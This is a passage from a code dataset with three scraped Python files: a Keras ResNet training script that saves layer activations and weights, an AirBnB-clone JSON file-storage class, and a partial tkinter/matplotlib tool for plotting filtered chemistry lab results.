Within each stage, the layers have the same number filters and the\n same filter map sizes.\n Features maps sizes:\n conv1 : 32x32, 16\n stage 0: 32x32, 64\n stage 1: 16x16, 128\n stage 2: 8x8, 256\n\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n\n # Returns\n model (Model): Keras model instance\n \"\"\"\n depth = n * 9 + 2\n input_shape = data[5]\n num_classes = data[6]\n if (depth - 2) % 9 != 0:\n raise ValueError('depth should be 9n+2 (eg 56 or 110 in [b])')\n\n # Start model definition.\n num_filters_in = 16\n num_res_blocks = int((depth - 2) / 9)\n\n inputs = Input(shape=input_shape)\n # v2 performs Conv2D with BN-ReLU on input before splitting into 2 paths\n x = resnet_layer(inputs=inputs,\n num_filters=num_filters_in,\n conv_first=True)\n\n # Instantiate the stack of residual units\n for stage in range(3):\n for res_block in range(num_res_blocks):\n activation = 'relu'\n batch_normalization = True\n strides = 1\n if stage == 0:\n num_filters_out = num_filters_in * 4\n if res_block == 0: # first layer and first stage\n activation = None\n batch_normalization = False\n else:\n num_filters_out = num_filters_in * 2\n if res_block == 0: # first layer but not first stage\n strides = 2 # downsample\n\n # bottleneck residual unit\n y = resnet_layer(inputs=x,\n num_filters=num_filters_in,\n kernel_size=1,\n strides=strides,\n activation=activation,\n batch_normalization=batch_normalization,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_in,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_out,\n kernel_size=1,\n conv_first=False)\n if res_block == 0:\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters_out,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = keras.layers.add([x, y])\n\n num_filters_in = num_filters_out\n\n # Add classifier on top.\n # v2 has BN-ReLU before Pooling\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = AveragePooling2D(pool_size=8)(x)\n y = Flatten()(x)\n outputs = Dense(num_classes,\n activation='softmax',\n kernel_initializer='he_normal')(y)\n\n # Instantiate model.\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\n#n = 3\ndef ResNet(version, n, data, settings):\n batch_size = settings[0]\n epochs = settings[1]\n data_augmentation = settings[2]\n x_train = data[0]\n y_train = data[1]\n x_test = data[2]\n y_test = data[3]\n x_train_mean = data[4]\n if version == 2:\n model = resnet_v2(n, data)\n depth = n * 9 + 2\n else:\n model = resnet_v1(n, data)\n depth = n * 6 + 2\n\n # Model name, depth and version\n model_type = 'ResNet%dv%d' % (depth, version)\n model.compile(loss='categorical_crossentropy',\n optimizer=Adam(learning_rate=lr_schedule(0)),\n metrics=['accuracy'])\n model.summary()\n print(model_type)\n # number of layers\n number_of_layers = model.layers\n print('The number of layers is:', len(number_of_layers))\n\n # --------------------------------------------------------------------------------\n # Get Output Activations\n num_layers = len(number_of_layers)\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n 
#print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n # ---------------------------------------------------------------------------------\n\n # Prepare model model saving directory.\n save_dir = os.path.join(os.getcwd(), 'saved_models')\n model_name = 'cifar10_%s_model.{epoch:03d}.h5' % model_type\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n filepath = os.path.join(save_dir, model_name)\n print('filepath', filepath)\n\n # Prepare callbacks for model saving and for learning rate adjustment.\n checkpoint = ModelCheckpoint(filepath=filepath,\n monitor='val_acc',\n verbose=1,\n save_best_only=True)\n\n lr_scheduler = LearningRateScheduler(lr_schedule)\n\n lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),\n cooldown=0,\n patience=5,\n min_lr=0.5e-6)\n\n callbacks = [checkpoint, lr_reducer, lr_scheduler]\n\n # Run training, with or without data augmentation.\n if not data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True,\n callbacks=callbacks)\n else:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n # set input mean to 0 over the dataset\n featurewise_center=False,\n # set each sample mean to 0\n samplewise_center=False,\n # divide inputs by std of dataset\n featurewise_std_normalization=False,\n # divide each input by its std\n samplewise_std_normalization=False,\n # apply ZCA whitening\n zca_whitening=False,\n # epsilon for ZCA whitening\n zca_epsilon=1e-06,\n # randomly rotate images in the range (deg 0 to 180)\n rotation_range=0,\n # randomly shift images horizontally\n width_shift_range=0.1,\n # randomly shift images vertically\n height_shift_range=0.1,\n # set range for random shear\n shear_range=0.,\n # set range for random zoom\n zoom_range=0.,\n # set range for random channel shifts\n channel_shift_range=0.,\n # set mode for filling points outside the input boundaries\n fill_mode='nearest',\n # value used for fill_mode = \"constant\"\n cval=0.,\n # randomly flip images\n horizontal_flip=True,\n # randomly flip images\n vertical_flip=False,\n # set rescaling factor (applied before any other transformation)\n rescale=None,\n # set function that will be applied on each input\n preprocessing_function=None,\n # image data format, either \"channels_first\" or \"channels_last\"\n data_format=None,\n # fraction of images reserved for validation (strictly between 0 and 1)\n validation_split=0.0)\n\n # Compute quantities required for featurewise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(x_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n epochs=epochs, verbose=1, workers=4,\n callbacks=callbacks)\n\n # Score trained model.\n scores = model.evaluate(x_test, y_test, verbose=1)\n print('Test loss:', scores[0])\n print('Test accuracy:', scores[1])\n #plot = plot_model(model)\n #see if install jupyter notebook to get image of plot.\n model.save(\"resnetv2_model.h5\")\n return model\n\n\ndef activations_compression(model, data, settings):\n # Get Output 
Activations\n x_test = data[2]\n batch_size = settings[0]\n number_of_layers = model.layers\n print('number of layers:', len(number_of_layers))\n num_layers = len(number_of_layers)\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n #print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n\n data = x_test\n num_batches = data.shape[0] // batch_size\n for batch_idx in range(num_batches):\n start = batch_idx * batch_size\n end = start + batch_size\n intermediate_output = intermediate_layer_model.predict(data[start:end])\n #print(\"Intermediate result batch {}/{} done\".format(batch_idx, num_batches))\n\n # loop to measure size of each layer, compresses it with all the compression algorithms and saves the ratios as well\n for i in range(len(intermediate_output)):\n #adjust to save matrizes - which type of file and how?\n #with io.open(\"ResNetv2_activations_of_layer_\" + str(i + 1) + \".txt\", 'w', encoding='utf-8') as f:\n #f.write(str(intermediate_output[i]))\n #number of entries in matrix:\n num_entries = len(intermediate_output[i].flatten())\n print('number of entries of', i+1, 'layer is:', num_entries)\n #size of matrix in KB\n size_entries = RAS.get_obj_size(intermediate_output[i])\n print('size of entries of', i+1, 'layer is: ', size_entries, 'KB')\n #compress with all the algorithms (try with huffman then add others)\n compression = Compression_Main.compress_all(intermediate_output[i])\n #print(i + 1, 'th layer activations', intermediate_output[i])\n i += 1\n return\n\n\n#save the activation & weight matrizes from each individual layer as well as the global matrix\n#try epoch later maybe\ndef activations_weights(model, data, settings, modelname):\n #get weights of each layer\n\n #w_d = dict()\n #for layer in model.layers:\n # print(layer.get_config(), layer.get_weights())\n # layer_[layer]_weights = layer.get_weights(layer)\n #get global weights\n '''\n####weights\n# weight_dict = {}\n global_weights = model.get_weights()\n print('Global weights matrix:', global_weights)\n np.save(modelname+'global_weights', global_weights)\n\n for layer_i in range(0,len(model.layers)-1):\n w = model.layers[layer_i].get_weights()[0]\n #saves weights as np.arrays to acording file\n np.save(modelname+'_weights_'+str(layer_i+1), w)\n print('Layer %s has weights of shape %s ' % (layer_i, np.shape(w)))\n##############################################################\n # save all weights and biases inside a dictionary\n if epoch == 0:\n # create array to hold weights\n weight_dict['w_' + str(layer_i + 1)] = w\n\n else:\n # append new weights to previously-created weights array\n weight_dict['w_' + str(layer_i + 1)] = np.dstack(\n (weight_dict['w_' + str(layer_i + 1)], w))\n print('weights dictionary:', weight_dict)\n '''\n####activations\n# Get Output Activations\n x_test = data[2]\n batch_size = settings[0]\n number_of_layers = model.layers\n num_layers = len(number_of_layers)\n print('number of layers:', len(number_of_layers))\n all_layers = list()\n for layer_index in range(1, num_layers):\n all_layers.append(model.get_layer(name=None, index=layer_index).output)\n # print('intermediate 
layer number', layer_index, 'is layer:', model.get_layer(name=None, index=layer_index).output)\n #print('intermediate layer activations:', Model(inputs=model.input, outputs=model.get_layer(name=None, index=layer_index).output))\n\n intermediate_layer_model_input = model.input\n intermediate_layer_model = Model(inputs=intermediate_layer_model_input, outputs=all_layers)\n\n data = x_test\n num_batches = data.shape[0] // batch_size\n for batch_idx in range(num_batches):\n start = batch_idx * batch_size\n end = start + batch_size\n intermediate_output = intermediate_layer_model.predict(data[start:end])\n #print(\"Intermediate result batch {}/{} done\".format(batch_idx, num_batches))\n\n #check this and change https://careerkarma.com/blog/python-typeerror-list-object-is-not-callable/#:~:text=Conclusion-,The%20Python%20%E2%80%9Ctypeerror%3A%20'list'%20object%20is%20not%20callable,list%20rather%20than%20curly%20brackets.\n #global_activations = intermediate_output\n #print('Global activations matrix:', global_activations)\n #np.save(modelname + 'global_activations', global_activations)\n global_a = intermediate_output[0].flatten()\n print('length of activations layers:', len(intermediate_output))\n for i in range(len(intermediate_output)):\n a = intermediate_output[i]\n # save activations as np.arrays to according file\n np.save(modelname + '_activations_' + str(i + 1), a)\n if i > 0:\n a_g = a.flatten()\n global_a = np.concatenate((global_a, a_g), axis = 0)\n np.save(modelname + 'global_activations', global_a)\n\n ######################################\n #weights\n #tf.keras.layers.Layer.get_weights()\n global_weights = model.get_weights()\n #print('Global weights matrix:', global_weights)\n np.save(modelname + 'global_weights', global_weights)\n\n '''\n i = 1\n for layer in model.layers:\n weights = layer.get_weights()\n print('weights'+ str(i) , weights)\n i += 1\n '''\n #https://ai-pool.com/d/how-to-get-the-weights-of-keras-model- to check loope\n i = 1\n for layer in model.layers:\n #print('i is: ', i)\n w = layer.get_weights()\n #print('weights'+ str(i) , weights)\n #w = model.get_layer(index=i).get_weights()[0]\n #w = model.get_layers[i].get_weights()[0]\n #w = model.layers[i].get_weights()[0]\n # saves weights as np.arrays to acording file\n np.save(modelname + '_weights_' + str(i), w)\n print('Layer %s has weights of shape %s ' % (i, np.shape(w)))\n i += 1\n\n\n\n#################################################################\nsettings = training_parameters(32, 1, True, 10, True)\ndata = data(10, settings)\n#resnet2 = ResNet(2, 3, data, settings)\nloaded_model = load_model(\"resnetv2_model.h5\")\n#compression = activations_compression(resnet2, data, settings)\n#activations_weights(resnet2, data, settings, \"ResNetv2\")\nactivations_weights(loaded_model, data, settings, \"ResNetv2\")\n","repo_name":"M2theJJ/NN","sub_path":"NN_TO/Backup.py","file_name":"Backup.py","file_ext":"py","file_size_in_byte":24627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"24870393445","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage file storage for hbnb clone\"\"\"\nimport json\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass FileStorage:\n \"\"\"This class manages storage of hbnb models in JSON format\"\"\"\n __file_path = 
'file.json'\n __objects = {}\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n if cls is not None:\n # If cls is provided as a string, convert it to a class object\n if type(cls) == str:\n cls = eval(cls)\n my_dict = {}\n # Iterate through the items in the __objects dictionary\n for key, value in self.__objects.items():\n # Check if the type of the value\n # matches the provided class (cls)\n if type(value) == cls:\n # If it matches, add it to the my_dict dictionary\n my_dict[key] = value\n # Return the filtered dictionary\n # containing instances of the provided class\n return my_dict\n return self.__objects\n\n def new(self, obj):\n \"\"\"Adds new object to storage dictionary\"\"\"\n class_name = obj.to_dict().get('__class__')\n obj_id = obj.to_dict().get('id')\n\n if class_name is None:\n print(f\"Error: '__class__' is None for object {obj}\")\n return\n\n if obj_id is None:\n print(f\"Error: 'id' is None for object {obj}\")\n return\n\n key = f\"{class_name}.{obj_id}\"\n self.all().update({key: obj})\n\n def save(self):\n \"\"\"Saves storage dictionary to file\"\"\"\n with open(FileStorage.__file_path, 'w') as f:\n temp = {}\n temp.update(FileStorage.__objects)\n for key, val in temp.items():\n temp[key] = val.to_dict()\n json.dump(temp, f)\n\n def reload(self):\n \"\"\"Loads storage dictionary from file\"\"\"\n\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n try:\n temp = {}\n with open(FileStorage.__file_path, 'r') as f:\n temp = json.load(f)\n for key, val in temp.items():\n self.all()[key] = classes[val['__class__']](**val)\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n \"\"\"It Deletes the object from __objects\"\"\"\n if obj is not None:\n key = \"{}.{}\".format(type(obj).__name__, obj.id)\n if key in self.__objects:\n del self.__objects[key]\n\n def close(self):\n \"\"\"Deserializing\n the JSON file to objects\n \"\"\"\n self.reload()\n","repo_name":"AmalNadifi/AirBnB_clone_v2","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"13270212376","text":"import math\r\nimport tkinter as tk\r\nfrom itertools import cycle\r\nfrom tkinter import ttk\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import gridspec\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom dfextractions import df_extractions\r\nfrom dfgc import df_gc, df_gc_stat\r\nfrom dfhplc import df_hplc_results\r\nfrom dfsamples import df_samples\r\n\r\nmatplotlib.use('TkAgg')\r\n\r\n\r\nclass Dataset:\r\n dataframes = {}\r\n cat_columns = {}\r\n num_columns = {}\r\n\r\n @staticmethod\r\n def set_df(name, df):\r\n Dataset.num_columns[name] = list(df.select_dtypes(include=[np.number]).columns.values)\r\n Dataset.cat_columns[name] = list(df.select_dtypes(exclude=[np.number]).columns.values)\r\n Dataset.dataframes[name] = df\r\n\r\n def __init__(self):\r\n df_extractions_raw = df_extractions\r\n self.set_df('Extraktionen', df_extractions_raw)\r\n\r\n df_samples_raw = df_samples\r\n self.set_df('Analytikproben', df_samples_raw)\r\n\r\n df_gc_results_raw = df_gc\r\n self.set_df('GC Ergebnisse', df_gc_results_raw)\r\n\r\n df_gc_results = df_gc_stat\r\n self.set_df('GC Ergebnisse (Stat)', df_gc_results)\r\n\r\n 
df_hplc_results_raw = df_hplc_results\r\n self.set_df('HPLC Ergebnisse', df_hplc_results_raw)\r\n\r\n @staticmethod\r\n def get_columns(*args, **kwargs):\r\n dfs = {}\r\n for arg in args:\r\n if arg is None:\r\n continue\r\n df, col = arg.split(': ')\r\n if df in dfs.keys():\r\n dfs[df].append(col)\r\n else:\r\n dfs[df] = ['Inhalt', 'Versuch', col]\r\n prefilter = {'ex': {}, 'in': {}}\r\n if \"filter\" in kwargs.keys():\r\n incl, excl = kwargs['filter'].get_rule()\r\n for key, vals in incl.items():\r\n df, col = key.split(': ')\r\n if df in prefilter['in'].keys():\r\n prefilter['in'][df][col] = vals\r\n else:\r\n prefilter['in'][df] = {col: vals}\r\n for key, vals in excl.items():\r\n df, col = key.split(': ')\r\n if df in prefilter['ex'].keys():\r\n prefilter['ex'][df][col] = vals\r\n else:\r\n prefilter['ex'][df] = {col: vals}\r\n dfs = sorted(dfs.items(), key=lambda item: Dataset.dataframes[item[0]].shape[0], reverse=True)\r\n ret = Dataset.dataframes[dfs[0][0]]\r\n if dfs[0][0] in prefilter['in'].keys():\r\n for col, vals in prefilter['in'][dfs[0][0]]:\r\n ret = ret[ret[col].isin(vals)]\r\n prefilter['in'].pop(dfs[0][0], None)\r\n elif dfs[0][0] in prefilter['ex'].keys():\r\n for col, vals in prefilter['ex'][dfs[0][0]]:\r\n ret = ret[~ret[col].isin(vals)]\r\n prefilter['ex'].pop(dfs[0][0], None)\r\n ret = ret[dfs[0][1]].dropna().set_index(['Versuch', 'Inhalt'])\r\n ret.columns = [f\"{dfs[0][0]}: {col}\" for col in ret.columns]\r\n for df, cols in dfs[1:]:\r\n tmp = Dataset.dataframes[df]\r\n if df in prefilter['in'].keys():\r\n for col, vals in prefilter['in'][df].items():\r\n tmp = tmp[tmp[col].isin(vals)]\r\n prefilter['in'].pop(df, None)\r\n if df in prefilter['ex'].keys():\r\n for col, vals in prefilter['ex'][df].items():\r\n tmp = tmp[~tmp[col].isin(vals)]\r\n prefilter['ex'].pop(df, None)\r\n tmp = tmp[cols].dropna().set_index(['Versuch', 'Inhalt'])\r\n tmp.columns = [f\"{df}: {cl}\" for cl in tmp.columns]\r\n ret = ret.merge(tmp, left_index=True, right_index=True)\r\n ret = ret.reset_index()\r\n for df, info in prefilter['in'].items():\r\n tmp = Dataset.dataframes[df]\r\n for col, values in info.items():\r\n tmp = tmp[tmp[col].isin(values)]\r\n ret = tmp[['Versuch', 'Inhalt']].merge(ret, left_on=['Versuch', 'Inhalt'], right_on=['Versuch', 'Inhalt'])\r\n for df, info in prefilter['ex'].items():\r\n tmp = Dataset.dataframes[df]\r\n for col, values in info.items():\r\n tmp = tmp[~tmp[col].isin(values)]\r\n ret = tmp[['Versuch', 'Inhalt']].merge(ret, left_on=['Versuch', 'Inhalt'], right_on=['Versuch', 'Inhalt'])\r\n with pd.option_context('display.max_rows', None, 'display.max_columns', None, \"display.width\", 400):\r\n print(ret)\r\n ret = [ret[arg] if arg is not None else None for arg in list(args) + ['Versuch', 'Inhalt']]\r\n return ret\r\n\r\n @staticmethod\r\n def dict_o_lists_to_str(dict):\r\n acc = []\r\n for dataframe, columns in dict.items():\r\n for column in columns:\r\n acc.append(f\"{dataframe}: {column}\")\r\n return acc\r\n\r\n @staticmethod\r\n def get_numerical_columns():\r\n return Dataset.dict_o_lists_to_str(Dataset.num_columns)\r\n\r\n @staticmethod\r\n def get_categorical_columns():\r\n return Dataset.dict_o_lists_to_str(Dataset.cat_columns)\r\n\r\n\r\nclass Series:\r\n def __init__(self, title, master):\r\n self.master = master\r\n self.title = title\r\n self.row = 1\r\n self.frame = None\r\n self.button = None\r\n self.include = {}\r\n self.exclude = {}\r\n\r\n def get_rule(self):\r\n acc = {}\r\n exc = {}\r\n for flt in self.include.values():\r\n if flt[0] 
in acc.keys():\r\n acc[flt[0]].append(flt[1])\r\n else:\r\n acc[flt[0]] = [flt[1]]\r\n for flt in self.exclude.values():\r\n if flt[0] in exc.keys():\r\n exc[flt[0]].append(flt[1])\r\n else:\r\n exc[flt[0]] = [flt[1]]\r\n return acc, exc\r\n\r\n def set_filter(self, cb1, cb2, cb3):\r\n row = cb1.grid_info()['row']\r\n\r\n self.include.pop(row, None)\r\n self.exclude.pop(row, None)\r\n\r\n incl = cb1.get()\r\n dfcol = cb2.get()\r\n value = cb3.get()\r\n if len(incl) > 0 and len(dfcol) > 0 and len(value) > 0:\r\n if incl == 'inklusive':\r\n self.include[row] = (dfcol, value)\r\n elif incl == 'exklusive':\r\n self.exclude[row] = (dfcol, value)\r\n self.master.update()\r\n\r\n def load_options(self, event, cb1, cb2, cb3):\r\n df, col = event.widget.get().split(': ')\r\n cb3.set('')\r\n cb3.configure(values=list(Dataset.dataframes[df][col].unique()))\r\n self.set_filter(cb1, cb2, cb3)\r\n\r\n def __add_btn(self, frame, row):\r\n self.__add_filter(frame, row)\r\n self.row += 1\r\n\r\n def __add_filter(self, frame, row, include=None, dfcol=None, val=None):\r\n tk.Label(frame, text='Filter: ').grid(column=0, row=row, sticky='W')\r\n cb1 = ttk.Combobox(frame, values=['inklusive', 'exklusive', 'inaktiv'], width=8)\r\n cb1.grid(column=1, row=row)\r\n if include:\r\n cb1.set(include)\r\n cb3 = ttk.Combobox(frame, values=[], width=18)\r\n if val:\r\n cb3.set(val)\r\n cb3.grid(column=3, row=row)\r\n cb2 = ttk.Combobox(frame, values=Dataset.get_categorical_columns(), width=35)\r\n if dfcol:\r\n cb2.set(dfcol)\r\n df, col = dfcol.split(': ')\r\n cb3.configure(values=list(Dataset.dataframes[df][col].unique()))\r\n cb2.bind('<>', lambda event: self.load_options(event, cb1, cb2, cb3))\r\n cb2.grid(column=2, row=row)\r\n cb1.bind('<>', lambda event: self.set_filter(cb1, cb2, cb3))\r\n cb3.bind('<>', lambda event: self.set_filter(cb1, cb2, cb3))\r\n self.button.grid(column=0, row=self.row + 1, columnspan=4)\r\n\r\n def apply_gui(self, frame):\r\n self.frame = frame\r\n self.button = tk.Button(self.frame, width=50, text=\"+\", command=lambda: self.__add_btn(self.frame, self.row))\r\n for i in range(self.row):\r\n if i in self.exclude.keys():\r\n dfcol, val = self.exclude[i]\r\n self.__add_filter(self.frame, i, 'exklusive', dfcol, val)\r\n elif i in self.include.keys():\r\n dfcol, val = self.include[i]\r\n self.__add_filter(self.frame, i, 'inklusive', dfcol, val)\r\n else:\r\n self.__add_filter(self.frame, i)\r\n\r\n\r\nclass SeriesManager:\r\n def __cb(self, exp):\r\n exp.destroy()\r\n self.is_open = False\r\n\r\n def __init__(self, master):\r\n self.master = master\r\n self.series = []\r\n self.options = Dataset.get_categorical_columns()\r\n self.is_open = False\r\n\r\n def add(self, title, tab_ctrl, is_new=True):\r\n tab1 = ttk.Frame(tab_ctrl)\r\n if is_new:\r\n if len(title) == 0:\r\n title = f\"Reihe {len(self.series)}\"\r\n self.series.append(Series(title, self.master))\r\n self.series[-1].apply_gui(tab1)\r\n else:\r\n title.apply_gui(tab1)\r\n title = title.title\r\n tab_ctrl.add(tab1, text=title)\r\n\r\n def open(self):\r\n if self.is_open:\r\n return\r\n exp = tk.Toplevel(self.master)\r\n exp.title(f\"Reihenmanager {self.master.title}\")\r\n exp.protocol(\"WM_DELETE_WINDOW\", lambda: self.__cb(exp))\r\n exp.geometry(\"500x200\")\r\n tab_ctrl = ttk.Notebook(exp)\r\n tab1 = ttk.Frame(tab_ctrl)\r\n tk.Label(tab1, text='Reihenname: ').grid(column=0, row=0, sticky='W')\r\n e1 = tk.Entry(tab1, width=30)\r\n e1.grid(column=1, row=0)\r\n tk.Label(tab1, text='Neuer Reihenfilter: ').grid(column=0, row=1, 
sticky='W')\r\n tk.Button(tab1, text=\"Add\", width=28, command=lambda: self.add(e1.get(), tab_ctrl)).grid(column=1, row=1, sticky='W')\r\n tab_ctrl.add(tab1, text='+')\r\n for ser in self.series:\r\n self.add(ser, tab_ctrl, False)\r\n tab_ctrl.pack(expand=1, fill=\"both\")\r\n self.is_open = True\r\n\r\n\r\nclass Scatter3DWindow(tk.Frame):\r\n scaler = MinMaxScaler((0, 20))\r\n c_scaler = MinMaxScaler((0, 1))\r\n\r\n def __get_filters(self):\r\n if len(self.series.series):\r\n return self.series.series\r\n return [None]\r\n\r\n def __get_columns(self, ser=None):\r\n if ser:\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.z_vals, self.c_vals, self.s_vals, filter=ser)\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.z_vals, self.c_vals, self.s_vals)\r\n\r\n def update(self):\r\n if self.x_vals and self.y_vals and self.z_vals:\r\n self.ax.cla()\r\n self.ax.set_xlabel(self.x_vals)\r\n self.ax.set_ylabel(self.y_vals)\r\n self.ax.set_zlabel(self.z_vals)\r\n self.ax._custom_label_data = {}\r\n markers = ['o', 'v', '^', '<', '>', '1', '2', '3', '4', '*', 'P', 'p', 's', 'X', 'D']\r\n if self.s_vals:\r\n s = Dataset.get_columns(self.s_vals)[0]\r\n self.scaler.fit(s.to_numpy().reshape(-1,1))\r\n for ser, marker in zip(self.__get_filters(), cycle(markers)):\r\n x, y, z, c, s, v, i = self.__get_columns(ser)\r\n title = \"All\"\r\n if ser:\r\n title = ser.title\r\n if c is not None:\r\n c = self.c_scaler.fit_transform(c.to_numpy().reshape(-1,1))\r\n if self.s_vals:\r\n col = self.ax.scatter(xs=x, ys=y, zs=z, c=c, s=self.scaler.transform(s.to_numpy().reshape(-1, 1)), marker=marker, label=title)\r\n else:\r\n col = self.ax.scatter(xs=x, ys=y, zs=z, c=c, marker=marker, label=title)\r\n self.ax._custom_label_data[col] = (v, i)\r\n self.ax.legend()\r\n self.ax.set_title(self.title)\r\n plt.show(block=False)\r\n\r\n def x_changed(self, event):\r\n self.x_vals = event.widget.get()\r\n self.update()\r\n\r\n def y_changed(self, event):\r\n self.y_vals = event.widget.get()\r\n self.update()\r\n\r\n def z_changed(self, event):\r\n self.z_vals = event.widget.get()\r\n self.update()\r\n\r\n def color_changed(self, event):\r\n self.c_vals = event.widget.get()\r\n if self.c_vals == 'None':\r\n self.c_vals = None\r\n self.update()\r\n\r\n def scale_changed(self, event):\r\n self.s_vals = event.widget.get()\r\n if self.s_vals == 'None':\r\n self.s_vals = None\r\n self.update()\r\n\r\n def err_changed(self, event):\r\n self.e_vals = event.widget.get()\r\n if self.e_vals == 'None':\r\n self.e_vals = None\r\n self.update()\r\n\r\n def __init__(self, parent, p_ax, title):\r\n tk.Frame.__init__(self, parent)\r\n self.ax = p_ax\r\n self.title = title\r\n self.x_vals = None\r\n self.y_vals = None\r\n self.z_vals = None\r\n self.c_vals = None\r\n self.s_vals = None\r\n self.e_vals = None\r\n self.series = SeriesManager(self)\r\n\r\n ttk.Label(self, text=\"X Parameter: \").grid(column=0, row=0, sticky='W')\r\n cb1 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb1.bind('<>', self.x_changed)\r\n cb1.grid(column=1, row=0)\r\n\r\n ttk.Label(self, text=\"Y Parameter: \").grid(column=0, row=1, sticky='W')\r\n cb2 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb2.bind('<>', self.y_changed)\r\n cb2.grid(column=1, row=1)\r\n\r\n ttk.Label(self, text=\"Z Ergebnis: \").grid(column=0, row=2, sticky='W')\r\n cb3 = ttk.Combobox(self, values=Dataset.get_numerical_columns(), width=30)\r\n cb3.bind('<>', self.z_changed)\r\n cb3.grid(column=1, row=2)\r\n\r\n 
ttk.Label(self, text=\"Fehlerbalken: \").grid(column=0, row=3, sticky='W')\r\n cb_4 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb_4.bind('<>', self.err_changed)\r\n cb_4.set('None')\r\n cb_4.grid(column=1, row=3)\r\n\r\n ttk.Label(self, text=\"Farbwert: \").grid(column=0, row=4, sticky='W')\r\n cb5 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb5.bind('<>', self.color_changed)\r\n cb5.set('None')\r\n cb5.grid(column=1, row=4)\r\n\r\n ttk.Label(self, text=\"Größenwert: \").grid(column=0, row=5, sticky='W')\r\n cb6 = ttk.Combobox(self, values=['None'] + Dataset.get_numerical_columns(), width=30)\r\n cb6.bind('<>', self.scale_changed)\r\n cb6.set('None')\r\n cb6.grid(column=1, row=5)\r\n\r\n ttk.Label(self, text=\"Reihenmanager: \").grid(column=0, row=6, sticky='W')\r\n tk.Button(self, text=\"Datenfilter\", width=28, command=lambda: self.series.open()).grid(column=1, row=6)\r\n\r\n\r\nclass Scatter2DWindow(tk.Frame):\r\n scaler = MinMaxScaler((0, 20))\r\n\r\n def __get_filters(self):\r\n if len(self.series.series):\r\n return self.series.series\r\n return [None]\r\n\r\n def __get_columns(self, ser=None):\r\n if ser:\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.c_vals, self.s_vals, filter=ser)\r\n return Dataset.get_columns(self.x_vals, self.y_vals, self.c_vals, self.s_vals)\r\n\r\n def update(self):\r\n if self.x_vals and self.y_vals:\r\n self.ax.cla()\r\n self.ax.set_xlabel(self.x_vals)\r\n self.ax.set_ylabel(self.y_vals)\r\n self.ax._custom_label_data = {}\r\n markers = ['o', 'v', '^', '<', '>', '1', '2', '3', '4', '*', 'P', 'p', 's', 'X', 'D']\r\n if self.s_vals:\r\n s = Dataset.get_columns(self.s_vals)[0]\r\n self.scaler.fit(s.to_numpy().reshape(-1,1))\r\n for ser, marker in zip(self.__get_filters(), cycle(markers)):\r\n x, y, c, s, v, i = self.__get_columns(ser)\r\n title = \"All\"\r\n if ser:\r\n title = ser.title\r\n if self.s_vals:\r\n col = self.ax.scatter(x=x, y=y, c=c, s=self.scaler.transform(s.to_numpy().reshape(-1, 1)), marker=marker, label=title)\r\n else:\r\n col = self.ax.scatter(x=x, y=y, c=c, marker=marker, label=title)\r\n self.ax._custom_label_data[col] = (v, i)\r\n self.ax.legend()\r\n self.ax.set_title(self.title)\r\n plt.show(block=False)\r\n\r\n def x_changed(self, event):\r\n self.x_vals = event.widget.get()\r\n self.update()\r\n\r\n def y_changed(self, event):\r\n self.y_vals = event.widget.get()\r\n self.update()\r\n\r\n def color_changed(self, event):\r\n self.c_vals = event.widget.get()\r\n if self.c_vals == 'None':\r\n self.c_vals = None\r\n self.update()\r\n\r\n def 